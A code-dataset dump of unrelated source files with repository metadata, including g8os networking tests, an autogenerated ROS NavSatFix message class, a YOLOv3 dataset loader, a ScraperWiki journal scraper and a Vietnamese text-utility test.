"Apache-2.0"
] | permissive | GlenDC/0-core | 629bd9836ab4ff2fe0c40628419b58205bb64648 | 807fa1939199fa3aa3b3e57679f61bb6c72cc57f | refs/heads/master | 2021-06-17T19:52:40.405225 | 2017-06-14T16:42:39 | 2017-06-14T16:42:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,190 | py | from utils.utils import BaseTest
import time
import unittest
class BasicNetworking(BaseTest):
    """Integration tests for zerotier and bridge networking on g8os."""

    def setUp(self):
        super(BasicNetworking, self).setUp()
        self.check_g8os_connection(BasicNetworking)

    def test001_join_leave_list_zerotier(self):
        """ g8os-012
        *Test case for testing joining, listing, leaving zerotier networks*

        **Test Scenario:**
        #. Get NetworkId using zerotier API
        #. Join zerotier network (N1), should succeed
        #. List zerotier network
        #. Join fake zerotier network (N1), should fail
        #. Leave zerotier network (N1), should succeed
        #. List zerotier networks, N1 should be gone
        #. Leave zerotier network (N1), should fail
        """
        self.lg('{} STARTED'.format(self._testID))

        self.lg('Get NetworkId using zerotier API')
        networkId = self.getZtNetworkID()

        self.lg('Join zerotier network (N1), should succeed')
        self.client.zerotier.join(networkId)

        self.lg('List zerotier network')
        r = self.client.zerotier.list()
        self.assertIn(networkId, [x['nwid'] for x in r])

        self.lg('Join fake zerotier network (N1), should fail')
        with self.assertRaises(RuntimeError):
            self.client.zerotier.join(self.rand_str())

        self.lg('Leave zerotier network (N1), should succeed')
        self.client.zerotier.leave(networkId)

        self.lg('List zerotier networks, N1 should be gone')
        r = self.client.zerotier.list()
        self.assertNotIn(networkId, [x['nwid'] for x in r])

        self.lg('Leave zerotier network (N1), should fail')
        with self.assertRaises(RuntimeError):
            self.client.zerotier.leave(networkId)

        self.lg('{} ENDED'.format(self._testID))

    def test002_create_delete_list_bridges(self):
        """ g8os-013
        *Test case for testing creating, listing, deleting bridges*

        **Test Scenario:**
        #. Create bridge (B1), should succeed
        #. List bridges, B1 should be listed
        #. Create bridge with same name of (B1), should fail
        #. Delete bridge B1, should succeed
        #. List bridges, B1 should be gone
        #. Delete bridge B1, should fail
        """
        self.lg('{} STARTED'.format(self._testID))

        self.lg('Create bridge (B1), should succeed')
        bridge_name = self.rand_str()
        self.client.bridge.create(bridge_name)

        self.lg('List bridges, B1 should be listed')
        response = self.client.bridge.list()
        self.assertIn(bridge_name, response)

        self.lg('Create bridge with same name of (B1), should fail')
        with self.assertRaises(RuntimeError):
            self.client.bridge.create(bridge_name)

        self.lg('Delete bridge B1, should succeed')
        self.client.bridge.delete(bridge_name)

        self.lg('List bridges, B1 should be gone')
        response = self.client.bridge.list()
        self.assertNotIn(bridge_name, response)

        self.lg('Delete bridge B1, should fail')
        with self.assertRaises(RuntimeError):
            self.client.bridge.delete(bridge_name)

        self.lg('{} ENDED'.format(self._testID))
| [
"[email protected]"
] | |
52d164c079e7024407ee033d66648507ebb48c67 | 99052370591eadf44264dbe09022d4aa5cd9687d | /install/lib/python2.7/dist-packages/cwru_msgs/msg/_NavSatFix.py | 7fc5ec0e156d178ec0e03f7841197d2a80f8b5d4 | [] | no_license | brucemingxinliu/ros_ws | 11b1a3e142132925d35b3adf929f1000392c5bdc | 45f7e553ea20b79e3e93af5f77a1b14b64184875 | refs/heads/master | 2021-01-24T03:36:47.043040 | 2018-02-26T00:53:37 | 2018-02-26T00:53:37 | 122,892,702 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,328 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from cwru_msgs/NavSatFix.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import cwru_msgs.msg
import std_msgs.msg
class NavSatFix(genpy.Message):
    """Autogenerated genpy message class for cwru_msgs/NavSatFix.

    The file header states "Do not edit": this class is produced by the ROS
    message generator, so only comments/docstrings are added here.  The wire
    layout is: Header, NavSatStatus (int8 + uint16), three float64 values
    (latitude, longitude, altitude), nine float64 covariance entries and one
    uint8 covariance-type byte.
    """
    _md5sum = "2d3a8cd499b9b4a0249fb98fd05cfa48"
    _type = "cwru_msgs/NavSatFix"
    _has_header = True #flag to mark the presence of a Header object
    _full_text = """# Navigation Satellite fix for any Global Navigation Satellite System
#
# Specified using the WGS 84 reference ellipsoid
# Header specifies ROS time and frame of reference for this fix.
Header header
# satellite fix status information
cwru_msgs/NavSatStatus status
# Latitude [degrees]. Positive is north of equator; negative is south.
float64 latitude
# Longitude [degrees]. Positive is east of prime meridian; negative is west.
float64 longitude
# Altitude [m]. Positive is above the WGS 84 ellipsoid.
float64 altitude
# Position covariance [m^2] defined relative to a tangential plane
# through the reported position. The components are East, North, and
# Up (ENU), in row-major order.
#
# Beware: this coordinate system exhibits singularities at the poles.
float64[9] position_covariance
# If the covariance of the fix is known, fill it in completely. If the
# GPS receiver provides the variance of each measurement, put them
# along the diagonal. If only Dilution of Precision is available,
# estimate an approximate covariance from that.
uint8 COVARIANCE_TYPE_UNKNOWN = 0
uint8 COVARIANCE_TYPE_APPROXIMATED = 1
uint8 COVARIANCE_TYPE_DIAGONAL_KNOWN = 2
uint8 COVARIANCE_TYPE_KNOWN = 3
uint8 position_covariance_type
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')
# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
# 0: no frame
# 1: global frame
string frame_id
================================================================================
MSG: cwru_msgs/NavSatStatus
# Navigation Satellite fix status for any Global Navigation Satellite System
# Whether to output an augmented fix is determined by both the fix
# type and the last time differential corrections were received. A
# fix is valid when status >= STATUS_FIX.
int8 STATUS_NO_FIX = -1 # unable to fix position
int8 STATUS_FIX = 0 # unaugmented fix
int8 STATUS_SBAS_FIX = 1 # with satellite-based augmentation
int8 STATUS_GBAS_FIX = 2 # with ground-based augmentation
int8 status
# Bits defining which Global Navigation Satellite System signals were
# used by the receiver.
uint16 SERVICE_GPS = 1
uint16 SERVICE_GLONASS = 2
uint16 SERVICE_COMPASS = 4 # includes BeiDou.
uint16 SERVICE_GALILEO = 8
uint16 service
"""
    # Pseudo-constants
    # Covariance-type values mirroring the constants in the message text above.
    COVARIANCE_TYPE_UNKNOWN = 0
    COVARIANCE_TYPE_APPROXIMATED = 1
    COVARIANCE_TYPE_DIAGONAL_KNOWN = 2
    COVARIANCE_TYPE_KNOWN = 3

    __slots__ = ['header','status','latitude','longitude','altitude','position_covariance','position_covariance_type']
    _slot_types = ['std_msgs/Header','cwru_msgs/NavSatStatus','float64','float64','float64','float64[9]','uint8']

    def __init__(self, *args, **kwds):
        """
        Constructor. Any message fields that are implicitly/explicitly
        set to None will be assigned a default value. The recommend
        use is keyword arguments as this is more robust to future message
        changes. You cannot mix in-order arguments and keyword arguments.
        The available fields are:
           header,status,latitude,longitude,altitude,position_covariance,position_covariance_type
        :param args: complete set of field values, in .msg order
        :param kwds: use keyword arguments corresponding to message field names
        to set specific fields.
        """
        if args or kwds:
            super(NavSatFix, self).__init__(*args, **kwds)
            #message fields cannot be None, assign default values for those that are
            if self.header is None:
                self.header = std_msgs.msg.Header()
            if self.status is None:
                self.status = cwru_msgs.msg.NavSatStatus()
            if self.latitude is None:
                self.latitude = 0.
            if self.longitude is None:
                self.longitude = 0.
            if self.altitude is None:
                self.altitude = 0.
            if self.position_covariance is None:
                self.position_covariance = [0.,0.,0.,0.,0.,0.,0.,0.,0.]
            if self.position_covariance_type is None:
                self.position_covariance_type = 0
        else:
            # No arguments given: initialize every field to its default.
            self.header = std_msgs.msg.Header()
            self.status = cwru_msgs.msg.NavSatStatus()
            self.latitude = 0.
            self.longitude = 0.
            self.altitude = 0.
            self.position_covariance = [0.,0.,0.,0.,0.,0.,0.,0.,0.]
            self.position_covariance_type = 0

    def _get_types(self):
        """
        internal API method
        """
        return self._slot_types

    def serialize(self, buff):
        """
        serialize message into buffer
        :param buff: buffer, ``StringIO``
        """
        try:
            _x = self
            buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
            _x = self.header.frame_id
            length = len(_x)
            if python3 or type(_x) == unicode:
                _x = _x.encode('utf-8')
                length = len(_x)
            # Strings are serialized as a uint32 length followed by the bytes.
            if python3:
                buff.write(struct.pack('<I%sB'%length, length, *_x))
            else:
                buff.write(struct.pack('<I%ss'%length, length, _x))
            _x = self
            buff.write(_struct_bH3d.pack(_x.status.status, _x.status.service, _x.latitude, _x.longitude, _x.altitude))
            buff.write(_struct_9d.pack(*self.position_covariance))
            buff.write(_struct_B.pack(self.position_covariance_type))
        except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
        except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))

    def deserialize(self, str):
        """
        unpack serialized message in str into this message instance
        :param str: byte array of serialized message, ``str``
        """
        try:
            if self.header is None:
                self.header = std_msgs.msg.Header()
            if self.status is None:
                self.status = cwru_msgs.msg.NavSatStatus()
            end = 0
            _x = self
            start = end
            end += 12
            (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
            start = end
            end += 4
            (length,) = _struct_I.unpack(str[start:end])
            start = end
            end += length
            if python3:
                self.header.frame_id = str[start:end].decode('utf-8')
            else:
                self.header.frame_id = str[start:end]
            _x = self
            start = end
            # 27 bytes = 1 (int8 status) + 2 (uint16 service) + 3*8 (float64s).
            end += 27
            (_x.status.status, _x.status.service, _x.latitude, _x.longitude, _x.altitude,) = _struct_bH3d.unpack(str[start:end])
            start = end
            # 72 bytes = 9 float64 covariance entries.
            end += 72
            self.position_covariance = _struct_9d.unpack(str[start:end])
            start = end
            end += 1
            (self.position_covariance_type,) = _struct_B.unpack(str[start:end])
            return self
        except struct.error as e:
            raise genpy.DeserializationError(e) #most likely buffer underfill

    def serialize_numpy(self, buff, numpy):
        """
        serialize message with numpy array types into buffer
        :param buff: buffer, ``StringIO``
        :param numpy: numpy python module
        """
        try:
            _x = self
            buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
            _x = self.header.frame_id
            length = len(_x)
            if python3 or type(_x) == unicode:
                _x = _x.encode('utf-8')
                length = len(_x)
            if python3:
                buff.write(struct.pack('<I%sB'%length, length, *_x))
            else:
                buff.write(struct.pack('<I%ss'%length, length, _x))
            _x = self
            buff.write(_struct_bH3d.pack(_x.status.status, _x.status.service, _x.latitude, _x.longitude, _x.altitude))
            # The covariance is assumed to be a numpy array here — tostring()
            # writes its raw buffer.
            buff.write(self.position_covariance.tostring())
            buff.write(_struct_B.pack(self.position_covariance_type))
        except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
        except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))

    def deserialize_numpy(self, str, numpy):
        """
        unpack serialized message in str into this message instance using numpy for array types
        :param str: byte array of serialized message, ``str``
        :param numpy: numpy python module
        """
        try:
            if self.header is None:
                self.header = std_msgs.msg.Header()
            if self.status is None:
                self.status = cwru_msgs.msg.NavSatStatus()
            end = 0
            _x = self
            start = end
            end += 12
            (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
            start = end
            end += 4
            (length,) = _struct_I.unpack(str[start:end])
            start = end
            end += length
            if python3:
                self.header.frame_id = str[start:end].decode('utf-8')
            else:
                self.header.frame_id = str[start:end]
            _x = self
            start = end
            end += 27
            (_x.status.status, _x.status.service, _x.latitude, _x.longitude, _x.altitude,) = _struct_bH3d.unpack(str[start:end])
            start = end
            end += 72
            # Zero-copy read of the nine covariance doubles into a numpy array.
            self.position_covariance = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=9)
            start = end
            end += 1
            (self.position_covariance_type,) = _struct_B.unpack(str[start:end])
            return self
        except struct.error as e:
            raise genpy.DeserializationError(e) #most likely buffer underfill
# Pre-compiled little-endian struct packers shared by the (de)serialization
# methods of NavSatFix above.
_struct_I = genpy.struct_I
_struct_3I = struct.Struct("<3I")      # header: seq, stamp.secs, stamp.nsecs
_struct_bH3d = struct.Struct("<bH3d")  # status.status, status.service, lat, lon, alt
_struct_9d = struct.Struct("<9d")      # 3x3 position covariance, row-major
_struct_B = struct.Struct("<B")        # position_covariance_type
| [
"[email protected]"
] | |
456dccc0d0b058daea30a5811b67c32f327eaad5 | eb9f655206c43c12b497c667ba56a0d358b6bc3a | /python/testData/breadcrumbs/exceptAs.py | 98450c359de443a2f944b026192782eee6f6b9cc | [
"Apache-2.0"
] | permissive | JetBrains/intellij-community | 2ed226e200ecc17c037dcddd4a006de56cd43941 | 05dbd4575d01a213f3f4d69aa4968473f2536142 | refs/heads/master | 2023-09-03T17:06:37.560889 | 2023-09-03T11:51:00 | 2023-09-03T12:12:27 | 2,489,216 | 16,288 | 6,635 | Apache-2.0 | 2023-09-12T07:41:58 | 2011-09-30T13:33:05 | null | UTF-8 | Python | false | false | 61 | py | try:
print "abc"
except KeyError as e:
print "d<caret>ef" | [
"[email protected]"
] | |
6b3e10704b67a05bbd5fc73fe408618d870f0728 | 262311e60529868e38c2c57ee3db573f8e11c458 | /qa-automated/runner.py | c841c2e6d2e393b0fa9c3ef97393f624bae447f1 | [] | no_license | huileizhan227/untitled | 1c5604736d9ffcce6f7cb7e308cdc0ebd07e116a | 07df74c89291b1664a28e3c8dcba51a917f1835f | refs/heads/master | 2023-01-27T11:51:37.609210 | 2020-04-16T11:49:59 | 2020-04-16T11:49:59 | 150,606,504 | 1 | 0 | null | 2023-01-09T12:00:12 | 2018-09-27T15:12:18 | HTML | UTF-8 | Python | false | false | 2,700 | py | import os
import sys
import time
import qasite
import pytest
import config
from multiprocessing import Pool
from performance import Report as Perf
from common import devicectl
from common import serverctl
from common import utils
def run(project_name=None, build_id=None, test_name_filter=None):
# before
if (not project_name) or (not build_id):
log_folder = os.path.join(config.LOG_FOLDER, utils.get_formated_time())
else:
log_folder = os.path.join(config.LOG_FOLDER, project_name, str(build_id))
# run server
serverctl.run_servers(log_folder=log_folder)
devicectl.uninstall_apk()
devicectl.uninstall_ua2()
devicectl.wakeup()
# run cases
devices = config.devices
# case_process_list = []
args_list = []
for device in devices:
report_folder = os.path.join(log_folder, device['name'])
if not os.path.exists(report_folder):
os.makedirs(report_folder)
perf_log = os.path.join(report_folder, 'performance.csv')
perf_report = os.path.join(report_folder, 'performance.html')
ui_report = os.path.join(report_folder, 'report.html')
device['perf_report'] = perf_report
device['ui_report'] = ui_report
args=(perf_log, perf_report, ui_report, device['id'], test_name_filter)
args_list.append(args)
pool = Pool(len(args_list))
pool.starmap(run_cases, args_list)
pool.close()
pool.join()
# stop server
print('run cases over, killing servers...')
serverctl.stop_servers()
# upload report
# todo 先上传一个测试报告,多报告需qasite支持
if (project_name is not None) and (build_id is not None):
print('uploading aotomated testing report...')
if not qasite.upload_report(devices[0]['ui_report'], 0, project_name, build_id):
print('upload failed')
print('uploading performance testing report...')
if not qasite.upload_report(devices[0]['perf_report'], 1, project_name, build_id):
print('upload failed')
print('test finished.')
def run_cases(perf_log, perf_report, ui_report, device_id, test_name_filter):
# runpytest
arg_list = [
'cases/app',
'--html={}'.format(ui_report),
'--self-contained-html',
'--device-id={}'.format(device_id),
'--perf-log={}'.format(perf_log),
'--perf-report={}'.format(perf_report)
]
if test_name_filter:
arg_list.extend(['-k', test_name_filter])
pytest.main(arg_list)
if __name__ == "__main__":
test_name_filter = None
if len(sys.argv) > 1:
test_name_filter = sys.argv[1]
run(test_name_filter=test_name_filter)
| [
"[email protected]"
] | |
4926ffe92721d5b449773c2caff35eabfbef1e6a | b410490f4249b4075eab92e3a16000a8b839e18c | /object_detection/YOLOv3/dataset.py | 835b5b26d48edf15af90e53cc530340dfc619848 | [] | no_license | TaeYeon-kim-ai/Pytorch | 5936145643a2b36b5c52e43f735bda81264ed6d5 | 452e5543a959f2b280b088635953985e1101041d | refs/heads/master | 2023-07-01T17:29:30.558774 | 2021-08-12T19:01:36 | 2021-08-12T19:01:36 | 387,499,162 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,282 | py | #import config
import numpy as np
import os
import pandas as pd
import torch
from PIL import Image, ImageFile
from torch.utils.data import Dataset, DataLoader
from utils import (
iou_width_height as iou,
non_max_suppression_as_nms,
)
ImageFile.LOAD_TRUNCATED_IMAGES = True
class YOLODataset(Dataset) :
def __init__(
self,
csv_file,
img_dir, label_dir,
anchors,
image_size = 416,
S = [13, 26, 52],
C = 20,
transform = None,
):
self.annotations = pd.read_csv(csv_file)
self.img_dir = img_dir
self.label_dir = label_dir
self.transform = transform
self.S = S
self.anchors
self.num_anchors = self.anchors.shape[0]
self.num_anchors_per_scale = self.num_anchors // 3
self.C = C
self.ignore_iou_thresh = 0.5
def __len__(self) :
return len(self.annotation)
def __getitem__(self, index) :
label_path = os.path.join(self.label_dir, self.annotations.iloc[index, 1])
bboxes = np.roll(np.loadtxt(fname=label_path, delimiter=" ", ndmim = 2), 4, axis = 1).tolist()
img_path = os.path.join(self.img_dir, self.annotations.iloc[index, 0])
image = np.array(Image.open(img_path).convert("RGB"))
if self.transform :
augmentation = self.transform(iamge = image, bboxes = bboxes)
image = augmentation["image"]
bboxes = augmentation["bboxes"]
targets = [torch.zeros((self.num_anchors // 3, S, S, 6)) for S in self.S] # [p_o, x, y , w, h, c]
for box in bboxes :
iou_anchors = iou(torch.Tensor(box[2:4]), self.anchors)
anchor_indices = iou_anchors.argsort(descending = True, dim = 0)
x, y, width, height, class_label = box
has_anchor = [False, False, False]
for anchor_idx in anchor_indices :
scale_idx = anchor_idx // self.num_anchors_per_scale # 0, 1, 2
anchor_on_scale = anchor_idx % self.num_anchors_per_scale # 0, 1, 2
S = self.S[scale_idx]
i, j = int(S*y), int(S * x) # x = 0.5, S = 13 --> int(6.5) = 6 .. 중심값 ?? roI
anchor_taken = targets[scale_idx][anchor_on_scale, i, j, 0]
if not anchor_taken and not has_anchor[scale_idx] : #anchor
targets[scale_idx][anchor_on_scale, i , j, 0] = 1
x_cell, y_cell = S*x - j, S*y - i # 6.5 both are between [0, 1]
width_cell, height_cell = (
width * S,
height * S,
)
box_coordinates = torch.tensor(
[x_cell, y_cell, width_cell, height_cell]
)
targets[scale_idx][anchor_on_scale, i, j, 1:5] = box_coordinates
targets[scale_idx][anchor_on_scale, i, j, 5] = int(class_label)
has_anchor[scale_idx] = True
elif not anchor_taken and iou_anchors[anchor_idx] > self.ignore_iou_thresh:
targets[scale_idx][anchor_on_scale, i, j, 0] = -1 #ignore this prediction
return image, tuple(targets)
| [
"[email protected]"
] | |
c0f054d4e60c35d007c3451890947d020565fbc5 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02783/s809384037.py | b1bac9c9f8363c745905fad4ee60b29b26e6e608 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 87 | py | n,d=list(map(int,input().split()))
if n%d==0:
print(n//d)
else:
print((n//d)+1) | [
"[email protected]"
] | |
fa653f9c0963489e50b7ebe54873f2359c9252e1 | 3d19e1a316de4d6d96471c64332fff7acfaf1308 | /Users/P/pere/postliste-ruter.py | 6868c570393c7a8e844c70e499b5f1ed041bc480 | [] | no_license | BerilBBJ/scraperwiki-scraper-vault | 4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc | 65ea6a943cc348a9caf3782b900b36446f7e137d | refs/heads/master | 2021-12-02T23:55:58.481210 | 2013-09-30T17:02:59 | 2013-09-30T17:02:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,876 | py | # -*- coding: UTF-8 -*-
import scraperwiki
import json
from BeautifulSoup import BeautifulSoup
import datetime
import dateutil.parser
import lxml.html
import resource
import sys
import urlparse
import re
# Register the journal index page with ScraperWiki and load helper libraries
# published as other scrapers.
scraperwiki.scrape('http://www2.ruter.no/verdt-a-vite/presse/offentlig-journal/')
lazycache=scraperwiki.swimport('lazycache')
postlistelib=scraperwiki.swimport('postliste-python-lib')

# Name of the public agency whose journal PDFs this scraper collects.
agency = 'Ruter AS'
def report_errors(errors):
    # Print every collected error and abort with a non-zero exit code.
    # Does nothing when the list is empty.
    if 0 < len(errors):
        print "Errors:"
        for e in errors:
            print e
        exit(1)
def out_of_cpu(arg, spent, hard, soft):
    # CPU-limit callback for postlistelib: report the errors gathered so far
    # (in *arg*) and exit.  *spent*/*hard*/*soft* are unused here.
    report_errors(arg)
def process_pdf(parser, pdfurl, errors):
    """Fetch one journal PDF and hand it to the parser for preprocessing.

    Parse failures are appended to the caller-supplied *errors* list so that
    report_errors() can display them later.
    """
    # BUG FIX: the original immediately rebound ``errors = []``, which shadowed
    # the caller's list — any IndexError appended here was silently lost and
    # never reached report_errors().  The caller's list is now used directly.
    postlistelib.exit_if_no_cpu_left(0, out_of_cpu, errors)
    try:
        pdfcontent = scraperwiki.scrape(pdfurl)
        parser.preprocess(pdfurl, pdfcontent)
        # Release the (potentially large) PDF body as soon as it is queued.
        pdfcontent = None
    except IndexError as e:
        errors.append(e)
def process_page_queue(parser, errors):
    # Parse all queued PDF pages.  Running out of scraper CPU time is not
    # fatal: it is recorded in *errors* so the run can resume later.
    try:
        parser.process_pages()
        postlistelib.exit_if_no_cpu_left(0, out_of_cpu, errors)
    except scraperwiki.CPUTimeExceededError, e:
        errors.append("Processing pages interrupted")
def process_journal_pdfs(parser, listurl, errors):
    """Find journal PDF links on *listurl* and process the ones not yet seen.

    Links inside ``div.vedlegg`` anchors are resolved against *listurl*;
    non-HTTP links and links that do not point to a PDF are skipped, as are
    PDFs the parser has already scraped.
    """
    html = scraperwiki.scrape(listurl)
    root = lxml.html.fromstring(html)
    # Release the raw page early; only the parsed tree is needed below.
    html = None
    for ahref in root.cssselect("div.vedlegg a"):
        href = ahref.attrib['href']
        url = urlparse.urljoin(listurl, href)
        if -1 != href.find("file://") or -1 == url.find(".pdf"):
            # Skip non-HTTP URLs and anything that is not a PDF.
            continue
        # The original had a no-op ``True`` statement in the already-scraped
        # branch and did the work in ``else``; the condition is inverted here
        # for clarity, with identical behavior.
        if not parser.is_already_scraped(url):
            process_pdf(parser, url, errors)
def test_small_pdfs(parser):
    # Test with some smaller PDFs
    # Debug helper: scrape a single small weekly journal PDF, report any
    # errors, and exit.  This function never returns.
    errors = []
    process_pdf(parser, "http://www2.ruter.no/Documents/Offentlig_journal/2012_Uke_24.pdf?epslanguage=no", errors)
    process_page_queue(parser, errors)
    report_errors(errors)
    exit(0)
# Main entry point: scan the journal index page, process every new PDF,
# then report any accumulated errors (exiting non-zero if there were any).
errors = []
parser = postlistelib.PDFJournalParser(agency=agency)

#test_small_pdfs(parser)

process_journal_pdfs(parser, "http://www2.ruter.no/verdt-a-vite/presse/offentlig-journal/", errors)
process_page_queue(parser, errors)
report_errors(errors)
# -*- coding: UTF-8 -*-
import scraperwiki
import json
from BeautifulSoup import BeautifulSoup
import datetime
import dateutil.parser
import lxml.html
import resource
import sys
import urlparse
import re
# Register the journal index page with ScraperWiki and load helper libraries
# published as other scrapers.
scraperwiki.scrape('http://www2.ruter.no/verdt-a-vite/presse/offentlig-journal/')
lazycache=scraperwiki.swimport('lazycache')
postlistelib=scraperwiki.swimport('postliste-python-lib')

# Name of the public agency whose journal PDFs this scraper collects.
agency = 'Ruter AS'
def report_errors(errors):
    # Print every collected error and abort with a non-zero exit code.
    # Does nothing when the list is empty.
    if 0 < len(errors):
        print "Errors:"
        for e in errors:
            print e
        exit(1)
def out_of_cpu(arg, spent, hard, soft):
    # CPU-limit callback for postlistelib: report the errors gathered so far
    # (in *arg*) and exit.  *spent*/*hard*/*soft* are unused here.
    report_errors(arg)
def process_pdf(parser, pdfurl, errors):
    """Fetch one journal PDF and hand it to the parser for preprocessing.

    Parse failures are appended to the caller-supplied *errors* list so that
    report_errors() can display them later.
    """
    # BUG FIX: the original immediately rebound ``errors = []``, which shadowed
    # the caller's list — any IndexError appended here was silently lost and
    # never reached report_errors().  The caller's list is now used directly.
    postlistelib.exit_if_no_cpu_left(0, out_of_cpu, errors)
    try:
        pdfcontent = scraperwiki.scrape(pdfurl)
        parser.preprocess(pdfurl, pdfcontent)
        # Release the (potentially large) PDF body as soon as it is queued.
        pdfcontent = None
    except IndexError as e:
        errors.append(e)
def process_page_queue(parser, errors):
    # Parse all queued PDF pages.  Running out of scraper CPU time is not
    # fatal: it is recorded in *errors* so the run can resume later.
    try:
        parser.process_pages()
        postlistelib.exit_if_no_cpu_left(0, out_of_cpu, errors)
    except scraperwiki.CPUTimeExceededError, e:
        errors.append("Processing pages interrupted")
def process_journal_pdfs(parser, listurl, errors):
    """Find journal PDF links on *listurl* and process the ones not yet seen.

    Links inside ``div.vedlegg`` anchors are resolved against *listurl*;
    non-HTTP links and links that do not point to a PDF are skipped, as are
    PDFs the parser has already scraped.
    """
    html = scraperwiki.scrape(listurl)
    root = lxml.html.fromstring(html)
    # Release the raw page early; only the parsed tree is needed below.
    html = None
    for ahref in root.cssselect("div.vedlegg a"):
        href = ahref.attrib['href']
        url = urlparse.urljoin(listurl, href)
        if -1 != href.find("file://") or -1 == url.find(".pdf"):
            # Skip non-HTTP URLs and anything that is not a PDF.
            continue
        # The original had a no-op ``True`` statement in the already-scraped
        # branch and did the work in ``else``; the condition is inverted here
        # for clarity, with identical behavior.
        if not parser.is_already_scraped(url):
            process_pdf(parser, url, errors)
def test_small_pdfs(parser):
    # Test with some smaller PDFs
    # Debug helper: scrape a single small weekly journal PDF, report any
    # errors, and exit.  This function never returns.
    errors = []
    process_pdf(parser, "http://www2.ruter.no/Documents/Offentlig_journal/2012_Uke_24.pdf?epslanguage=no", errors)
    process_page_queue(parser, errors)
    report_errors(errors)
    exit(0)
# Main entry point: scan the journal index page, process every new PDF,
# then report any accumulated errors (exiting non-zero if there were any).
errors = []
parser = postlistelib.PDFJournalParser(agency=agency)

#test_small_pdfs(parser)

process_journal_pdfs(parser, "http://www2.ruter.no/verdt-a-vite/presse/offentlig-journal/", errors)
process_page_queue(parser, errors)
report_errors(errors)
| [
"[email protected]"
] | |
274db1c7e4366ef5d355c5f0b6718f4d5f41f569 | 33524b5c049f934ce27fbf046db95799ac003385 | /Дистанционная_подготовка/Программирование_на_python/9_списки/zadache_N.py | bb6732945983d5ab8c93702cbfcc871d84f63cc6 | [] | no_license | mgbo/My_Exercise | 07b5f696d383b3b160262c5978ad645b46244b70 | 53fb175836717493e2c813ecb45c5d5e9d28dd23 | refs/heads/master | 2022-12-24T14:11:02.271443 | 2020-10-04T04:44:38 | 2020-10-04T04:44:38 | 291,413,440 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 118 | py |
# Read a list of integers from stdin and swap each adjacent pair in place:
# (a0, a1, a2, a3, ...) -> (a1, a0, a3, a2, ...).  A trailing element of an
# odd-length list stays where it is.
values = list(map(int, input().split()))
for left in range(0, len(values) - 1, 2):
    values[left], values[left + 1] = values[left + 1], values[left]
print(*values)
"[email protected]"
] | |
c151f1cb971c5514c93deb2d3355846a22aa6971 | 6f21068b31084e81f38db304a51a2609d8af37cd | /2_Scientific_Libraries/plotsine.py | 13f08b42e470e8a434e801048a9ba254ea8288aa | [] | no_license | vickyf/eurocontrol_datascience | 374b889cac7b8d377caa78079fb57098e73bba0a | 0a7c09002e3b5f22ad563b05a6b4afe4cb6791d7 | refs/heads/master | 2020-03-19T06:03:14.864839 | 2018-06-04T07:24:25 | 2018-06-04T07:24:25 | 135,986,678 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 142 | py | %matplotlib inline
import matplotlib.pyplot as plt
import numpy as np
x = np.linspace(0,2*np.pi, 100)
y = np.sin(x)
plt.plot(x,y)
plt.show() | [
"[email protected]"
] | |
07bac4b0659c7151d22ec455cb5bbb340db2a1c5 | 6219e6536774e8eeb4cadc4a84f6f2bea376c1b0 | /common/util_vietnamese_test.py | 3fa3dfa1e91ecf9cc5553850f8be6ef7c293dfd5 | [
"MIT"
] | permissive | nguyenminhthai/choinho | 109d354b410b92784a9737f020894d073bea1534 | d2a216fe7a5064d73cdee3e928a7beef7f511fd1 | refs/heads/master | 2023-05-07T16:51:46.667755 | 2019-10-22T07:53:41 | 2019-10-22T07:53:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,948 | py | #!/usr/bin/env python
# encoding: utf-8
import unittest
from common import util_vietnamese as uv
class TestUtilVietnamese(unittest.TestCase):
    """Unit tests for the Vietnamese text helpers in common.util_vietnamese.

    NOTE: ``assertEquals`` is a deprecated alias of ``assertEqual`` (removed
    in Python 3.12); all assertions below use ``assertEqual`` instead.
    """

    def testConvert2Unsign(self):
        # Diacritics are stripped while casing and punctuation are preserved.
        self.assertEqual(uv.convert2Unsign(u'Dĩ độc trị độc'), u'Di doc tri doc')
        self.assertEqual(uv.convert2Unsign(u'Ông ăn ổi Ạ'), u'Ong an oi A')
        self.assertEqual(uv.convert2Unsign(u'Giầy thể thao nữ'), u'Giay the thao nu')
